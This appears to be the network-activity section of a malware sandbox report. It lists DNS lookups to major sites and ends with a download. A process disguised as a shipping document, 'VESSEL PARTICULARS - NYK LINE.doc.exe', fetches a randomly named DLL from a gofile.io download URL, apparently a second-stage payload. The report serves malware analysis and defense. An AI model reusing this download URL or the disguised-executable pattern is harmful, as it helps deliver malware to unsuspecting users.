                                                              Sep 28, 2021 12:17:44.520672083 CEST5359153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:44.539851904 CEST53535918.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:45.416999102 CEST5968853192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:45.434010029 CEST53596888.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:45.705486059 CEST5603253192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:45.724420071 CEST53560328.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:45.739111900 CEST6115053192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:45.758105040 CEST53611508.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:45.809302092 CEST6345853192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:45.828233957 CEST53634588.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:45.857522011 CEST5042253192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:45.878273010 CEST53504228.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:46.926002979 CEST5324753192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:46.944946051 CEST53532478.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:46.948126078 CEST5854453192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:46.967089891 CEST53585448.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:47.019011974 CEST5381453192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:47.036232948 CEST53538148.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:47.047403097 CEST5130553192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:47.066380024 CEST53513058.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:48.132565022 CEST5367053192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:48.151639938 CEST53536708.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:48.156699896 CEST5516053192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:48.175852060 CEST53551608.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:48.207791090 CEST6141453192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:48.226809978 CEST53614148.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:48.239974022 CEST6384753192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:48.259388924 CEST53638478.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:48.646748066 CEST6152353192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:48.682326078 CEST53615238.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:54.185071945 CEST5055153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:54.218874931 CEST53505518.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:17:56.508388996 CEST6284753192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:17:56.529474020 CEST53628478.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:18:06.868622065 CEST5771253192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:18:06.888998985 CEST53577128.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:18:20.101375103 CEST6106453192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:18:20.120877981 CEST53610648.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:18:39.580028057 CEST6189153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:18:39.599740028 CEST53618918.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:18:45.480781078 CEST6158553192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:18:45.500493050 CEST53615858.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:18:48.652843952 CEST6516353192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:18:48.687308073 CEST53651638.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:18:56.506490946 CEST5896953192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:18:56.533853054 CEST53589698.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:19:04.545020103 CEST5397753192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:19:04.562258959 CEST53539778.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:19:06.858477116 CEST5714753192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:19:06.878015995 CEST53571478.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:19:20.033674002 CEST5238153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:19:20.060888052 CEST53523818.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:19:30.084446907 CEST4923153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:19:30.113796949 CEST53492318.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:19:39.286632061 CEST5321753192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:19:39.304291010 CEST53532178.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:20:01.754996061 CEST5255453192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:20:01.772497892 CEST53525548.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:20:03.771164894 CEST4960353192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:20:03.789901018 CEST53496038.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:20:38.046719074 CEST6447653192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:20:38.065428019 CEST53644768.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:21:11.172101974 CEST4997553192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:21:11.194654942 CEST53499758.8.8.8192.168.2.5
                                                              Sep 28, 2021 12:21:26.373656034 CEST5770153192.168.2.58.8.8.8
                                                              Sep 28, 2021 12:21:26.399378061 CEST53577018.8.8.8192.168.2.5

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                              Sep 28, 2021 12:17:33.139408112 CEST192.168.2.58.8.8.80x5fbaStandard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:33.171531916 CEST192.168.2.58.8.8.80x43e3Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:33.765621901 CEST192.168.2.58.8.8.80x2eaStandard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:33.904256105 CEST192.168.2.58.8.8.80xe4eStandard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:33.932734966 CEST192.168.2.58.8.8.80x49e2Standard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:34.357966900 CEST192.168.2.58.8.8.80xdf16Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:34.417715073 CEST192.168.2.58.8.8.80xb089Standard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:34.838607073 CEST192.168.2.58.8.8.80x54c3Standard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:35.484381914 CEST192.168.2.58.8.8.80x72efStandard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:35.506236076 CEST192.168.2.58.8.8.80x6d3dStandard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:35.562768936 CEST192.168.2.58.8.8.80x2882Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:35.592691898 CEST192.168.2.58.8.8.80xecd2Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:35.973292112 CEST192.168.2.58.8.8.80x4dfaStandard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.023938894 CEST192.168.2.58.8.8.80x61b8Standard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.090524912 CEST192.168.2.58.8.8.80x5e1dStandard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.121283054 CEST192.168.2.58.8.8.80x19ceStandard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.653968096 CEST192.168.2.58.8.8.80x7f74Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.679847002 CEST192.168.2.58.8.8.80xce68Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.749464035 CEST192.168.2.58.8.8.80x375aStandard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.778726101 CEST192.168.2.58.8.8.80xa3b2Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.206172943 CEST192.168.2.58.8.8.80xd83eStandard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.229633093 CEST192.168.2.58.8.8.80x26eStandard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.307578087 CEST192.168.2.58.8.8.80xdedeStandard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.335550070 CEST192.168.2.58.8.8.80xd40bStandard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.843363047 CEST192.168.2.58.8.8.80xc420Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.868196011 CEST192.168.2.58.8.8.80x803bStandard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.916884899 CEST192.168.2.58.8.8.80x664fStandard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.949146032 CEST192.168.2.58.8.8.80x1181Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:38.395714998 CEST192.168.2.58.8.8.80x9b54Standard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:38.420818090 CEST192.168.2.58.8.8.80xa844Standard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:38.499401093 CEST192.168.2.58.8.8.80xf716Standard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:38.527813911 CEST192.168.2.58.8.8.80xc2f0Standard query (0)www.facebook.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:43.118942976 CEST192.168.2.58.8.8.80x97c9Standard query (0)www.twitter.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:43.141413927 CEST192.168.2.58.8.8.80x421cStandard query (0)www.twitter.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:43.703321934 CEST192.168.2.58.8.8.80xec84Standard query (0)www.twitter.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:44.520672083 CEST192.168.2.58.8.8.80xa62fStandard query (0)www.twitter.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:45.705486059 CEST192.168.2.58.8.8.80xaeb5Standard query (0)www.twitter.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:45.739111900 CEST192.168.2.58.8.8.80x6da2Standard query (0)www.twitter.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:45.809302092 CEST192.168.2.58.8.8.80x251fStandard query (0)www.twitter.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:45.857522011 CEST192.168.2.58.8.8.80x28f4Standard query (0)www.twitter.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:46.926002979 CEST192.168.2.58.8.8.80x79cbStandard query (0)www.twitter.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:46.948126078 CEST192.168.2.58.8.8.80xca22Standard query (0)www.twitter.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:47.019011974 CEST192.168.2.58.8.8.80x6d24Standard query (0)www.twitter.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:47.047403097 CEST192.168.2.58.8.8.80x94ffStandard query (0)www.twitter.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:48.132565022 CEST192.168.2.58.8.8.80xcfceStandard query (0)www.twitter.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:48.156699896 CEST192.168.2.58.8.8.80xe971Standard query (0)www.twitter.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:48.207791090 CEST192.168.2.58.8.8.80xcfeeStandard query (0)www.twitter.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:48.239974022 CEST192.168.2.58.8.8.80x8c4eStandard query (0)www.twitter.comA (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:54.185071945 CEST192.168.2.58.8.8.80x61a5Standard query (0)store2.gofile.ioA (IP address)IN (0x0001)

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                              Sep 28, 2021 12:17:33.159081936 CEST8.8.8.8192.168.2.50x5fbaNo error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:33.190932035 CEST8.8.8.8192.168.2.50x43e3No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:33.786004066 CEST8.8.8.8192.168.2.50x2eaNo error (0)www.google.com142.250.184.68A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:33.923322916 CEST8.8.8.8192.168.2.50xe4eNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:33.923322916 CEST8.8.8.8192.168.2.50xe4eNo error (0)star-mini.c10r.facebook.com157.240.9.35A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:33.952614069 CEST8.8.8.8192.168.2.50x49e2No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:33.952614069 CEST8.8.8.8192.168.2.50x49e2No error (0)star-mini.c10r.facebook.com157.240.234.35A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:34.378730059 CEST8.8.8.8192.168.2.50xdf16No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:34.448486090 CEST8.8.8.8192.168.2.50xb089No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:34.448486090 CEST8.8.8.8192.168.2.50xb089No error (0)star-mini.c10r.facebook.com157.240.17.35A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:34.858047962 CEST8.8.8.8192.168.2.50x54c3No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:34.858047962 CEST8.8.8.8192.168.2.50x54c3No error (0)star-mini.c10r.facebook.com157.240.17.35A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:35.503261089 CEST8.8.8.8192.168.2.50x72efNo error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:35.525475025 CEST8.8.8.8192.168.2.50x6d3dNo error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:35.582648039 CEST8.8.8.8192.168.2.50x2882No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:35.611974955 CEST8.8.8.8192.168.2.50xecd2No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.020490885 CEST8.8.8.8192.168.2.50x4dfaNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.020490885 CEST8.8.8.8192.168.2.50x4dfaNo error (0)star-mini.c10r.facebook.com157.240.17.35A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.045708895 CEST8.8.8.8192.168.2.50x61b8No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.045708895 CEST8.8.8.8192.168.2.50x61b8No error (0)star-mini.c10r.facebook.com157.240.17.35A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.111426115 CEST8.8.8.8192.168.2.50x5e1dNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.111426115 CEST8.8.8.8192.168.2.50x5e1dNo error (0)star-mini.c10r.facebook.com157.240.17.35A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.142627954 CEST8.8.8.8192.168.2.50x19ceNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.142627954 CEST8.8.8.8192.168.2.50x19ceNo error (0)star-mini.c10r.facebook.com157.240.17.35A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.674272060 CEST8.8.8.8192.168.2.50x7f74No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.699255943 CEST8.8.8.8192.168.2.50xce68No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.771529913 CEST8.8.8.8192.168.2.50x375aNo error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:36.798778057 CEST8.8.8.8192.168.2.50xa3b2No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.226001024 CEST8.8.8.8192.168.2.50xd83eNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.226001024 CEST8.8.8.8192.168.2.50xd83eNo error (0)star-mini.c10r.facebook.com157.240.9.35A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.248771906 CEST8.8.8.8192.168.2.50x26eNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.248771906 CEST8.8.8.8192.168.2.50x26eNo error (0)star-mini.c10r.facebook.com157.240.234.35A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.328012943 CEST8.8.8.8192.168.2.50xdedeNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.328012943 CEST8.8.8.8192.168.2.50xdedeNo error (0)star-mini.c10r.facebook.com157.240.17.35A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.355453014 CEST8.8.8.8192.168.2.50xd40bNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.355453014 CEST8.8.8.8192.168.2.50xd40bNo error (0)star-mini.c10r.facebook.com157.240.17.35A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.865092039 CEST8.8.8.8192.168.2.50xc420No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.887912989 CEST8.8.8.8192.168.2.50x803bNo error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.937755108 CEST8.8.8.8192.168.2.50x664fNo error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:37.967988014 CEST8.8.8.8192.168.2.50x1181No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:38.415080070 CEST8.8.8.8192.168.2.50x9b54No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:38.415080070 CEST8.8.8.8192.168.2.50x9b54No error (0)star-mini.c10r.facebook.com157.240.9.35A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:38.441961050 CEST8.8.8.8192.168.2.50xa844No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:38.441961050 CEST8.8.8.8192.168.2.50xa844No error (0)star-mini.c10r.facebook.com157.240.17.35A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:38.517172098 CEST8.8.8.8192.168.2.50xf716No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:38.517172098 CEST8.8.8.8192.168.2.50xf716No error (0)star-mini.c10r.facebook.com157.240.9.35A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:38.548793077 CEST8.8.8.8192.168.2.50xc2f0No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:38.548793077 CEST8.8.8.8192.168.2.50xc2f0No error (0)star-mini.c10r.facebook.com157.240.9.35A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:43.137837887 CEST8.8.8.8192.168.2.50x97c9No error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:43.137837887 CEST8.8.8.8192.168.2.50x97c9No error (0)twitter.com104.244.42.129A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:43.137837887 CEST8.8.8.8192.168.2.50x97c9No error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:43.160586119 CEST8.8.8.8192.168.2.50x421cNo error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:43.160586119 CEST8.8.8.8192.168.2.50x421cNo error (0)twitter.com104.244.42.129A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:43.160586119 CEST8.8.8.8192.168.2.50x421cNo error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:43.722122908 CEST8.8.8.8192.168.2.50xec84No error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:43.722122908 CEST8.8.8.8192.168.2.50xec84No error (0)twitter.com104.244.42.129A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:43.722122908 CEST8.8.8.8192.168.2.50xec84No error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:44.539851904 CEST8.8.8.8192.168.2.50xa62fNo error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:44.539851904 CEST8.8.8.8192.168.2.50xa62fNo error (0)twitter.com104.244.42.1A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:44.539851904 CEST8.8.8.8192.168.2.50xa62fNo error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:45.724420071 CEST8.8.8.8192.168.2.50xaeb5No error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:45.724420071 CEST8.8.8.8192.168.2.50xaeb5No error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:45.724420071 CEST8.8.8.8192.168.2.50xaeb5No error (0)twitter.com104.244.42.129A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:45.758105040 CEST8.8.8.8192.168.2.50x6da2No error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:45.758105040 CEST8.8.8.8192.168.2.50x6da2No error (0)twitter.com104.244.42.1A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:45.758105040 CEST8.8.8.8192.168.2.50x6da2No error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:45.828233957 CEST8.8.8.8192.168.2.50x251fNo error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:45.828233957 CEST8.8.8.8192.168.2.50x251fNo error (0)twitter.com104.244.42.129A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:45.828233957 CEST8.8.8.8192.168.2.50x251fNo error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:45.878273010 CEST8.8.8.8192.168.2.50x28f4No error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:45.878273010 CEST8.8.8.8192.168.2.50x28f4No error (0)twitter.com104.244.42.193A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:45.878273010 CEST8.8.8.8192.168.2.50x28f4No error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:46.944946051 CEST8.8.8.8192.168.2.50x79cbNo error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:46.944946051 CEST8.8.8.8192.168.2.50x79cbNo error (0)twitter.com104.244.42.1A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:46.944946051 CEST8.8.8.8192.168.2.50x79cbNo error (0)twitter.com104.244.42.193A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:46.967089891 CEST8.8.8.8192.168.2.50xca22No error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:46.967089891 CEST8.8.8.8192.168.2.50xca22No error (0)twitter.com104.244.42.129A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:46.967089891 CEST8.8.8.8192.168.2.50xca22No error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:47.036232948 CEST8.8.8.8192.168.2.50x6d24No error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:47.036232948 CEST8.8.8.8192.168.2.50x6d24No error (0)twitter.com104.244.42.193A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:47.036232948 CEST8.8.8.8192.168.2.50x6d24No error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:47.066380024 CEST8.8.8.8192.168.2.50x94ffNo error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:47.066380024 CEST8.8.8.8192.168.2.50x94ffNo error (0)twitter.com104.244.42.129A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:47.066380024 CEST8.8.8.8192.168.2.50x94ffNo error (0)twitter.com104.244.42.1A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:48.151639938 CEST8.8.8.8192.168.2.50xcfceNo error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:48.151639938 CEST8.8.8.8192.168.2.50xcfceNo error (0)twitter.com104.244.42.1A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:48.151639938 CEST8.8.8.8192.168.2.50xcfceNo error (0)twitter.com104.244.42.129A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:48.175852060 CEST8.8.8.8192.168.2.50xe971No error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:48.175852060 CEST8.8.8.8192.168.2.50xe971No error (0)twitter.com104.244.42.193A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:48.175852060 CEST8.8.8.8192.168.2.50xe971No error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:48.226809978 CEST8.8.8.8192.168.2.50xcfeeNo error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:48.226809978 CEST8.8.8.8192.168.2.50xcfeeNo error (0)twitter.com104.244.42.1A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:48.226809978 CEST8.8.8.8192.168.2.50xcfeeNo error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:48.259388924 CEST8.8.8.8192.168.2.50x8c4eNo error (0)www.twitter.comtwitter.comCNAME (Canonical name)IN (0x0001)
                                                              Sep 28, 2021 12:17:48.259388924 CEST8.8.8.8192.168.2.50x8c4eNo error (0)twitter.com104.244.42.1A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:48.259388924 CEST8.8.8.8192.168.2.50x8c4eNo error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)
                                                              Sep 28, 2021 12:17:54.218874931 CEST8.8.8.8192.168.2.50x61a5No error (0)store2.gofile.io31.14.69.10A (IP address)IN (0x0001)

                                                              HTTP Request Dependency Graph

                                                              • store2.gofile.io

                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              0192.168.2.54974631.14.69.10443C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2021-09-28 10:17:54 UTC0OUTGET /download/956f4086-c03d-4dbb-9647-f6db09f6a8b5/Iyybawggybiqbtxofebfdynt.dll HTTP/1.1
                                                              Host: store2.gofile.io
                                                              Connection: Keep-Alive
                                                              2021-09-28 10:17:55 UTC0INHTTP/1.1 200 OK
                                                              Accept-Ranges: bytes
                                                              Access-Control-Allow-Origin: *
                                                              Content-Disposition: attachment; filename="Iyybawggybiqbtxofebfdynt.dll"
                                                              Content-Length: 244752
                                                              Content-Type: application/octet-stream
                                                              Date: Tue, 28 Sep 2021 10:17:55 GMT
